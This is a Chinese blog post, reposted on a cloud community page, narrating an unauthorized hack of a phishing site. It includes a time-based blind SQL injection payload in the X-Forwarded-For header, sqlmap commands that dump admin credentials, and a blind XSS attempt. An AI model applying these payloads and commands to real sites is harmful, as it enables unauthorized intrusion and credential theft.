前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >记一次对钓鱼网站的XFF头注入

记一次对钓鱼网站的XFF头注入

作者头像
HACK学习
发布2020-03-25 18:10:19
1.2K1
发布2020-03-25 18:10:19
举报
文章被收录于专栏:HACK学习HACK学习

本文由内部学员:YuChen投稿

事情还得从一个群说起,某穿越火线女主播粉丝群

群友发了个钓鱼网站

打开是这样的

信息收集一波

不过这个人好像是批量注册的

看下中间件信息

IP和端口开放情况

nmap再扫一扫看看

除了80

5555端口没响应

10010端口403

对10010进行目录扫描 未果

对网站目录扫描:

看样子是宝塔+Linux

收集完了开搞

登录框想到了注入

Burp抓包

对post的参数和UA进行fuzz时没什么发现

以前看过钓鱼的源码

想到了钓鱼网站可能会记录ip

尝试XFF头注入

可能有注入 盲注试试

代码语言:javascript
复制
X-Forwarded-For:'and (select 1 from(select(sleep(2)))x)#

保存请求包为a.txt

代码语言:javascript
复制
sqlmap.py -r C:\a.txt --batch --level 4

sqlmap.py -r "C:\a.txt" --batch--level 4 -D sql_2020sy_gbzp_ -T yunx_admin -C username,password --dump

拿到了用户名,密码

但是找不到后台

所以用XSS盲打试试

在输入账号密码处插入xss payload:

Emmm 插不进去

可能是前端限制 检查一下

发现了ts这个函数

找到js的这个函数 验证了是前端限制的想法

Burp抓包后插入XSS

等待结果。

写脚本看看同ip的其他站点

运行结果

都点开后都是这个样子域名过期的,没有绑定域名的

最后,sqlmap可以获取sql-shell权限

今天才刚刚搭建,已经有21条数据记录了

本文参与 腾讯云自媒体分享计划,分享自微信公众号。
原始发表:2020-03-15,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 HACK学习呀 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体分享计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
相关产品与服务
消息队列 TDMQ
消息队列 TDMQ (Tencent Distributed Message Queue)是腾讯基于 Apache Pulsar 自研的一个云原生消息中间件系列,其中包含兼容Pulsar、RabbitMQ、RocketMQ 等协议的消息队列子产品,得益于其底层计算与存储分离的架构,TDMQ 具备良好的弹性伸缩以及故障恢复能力。
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档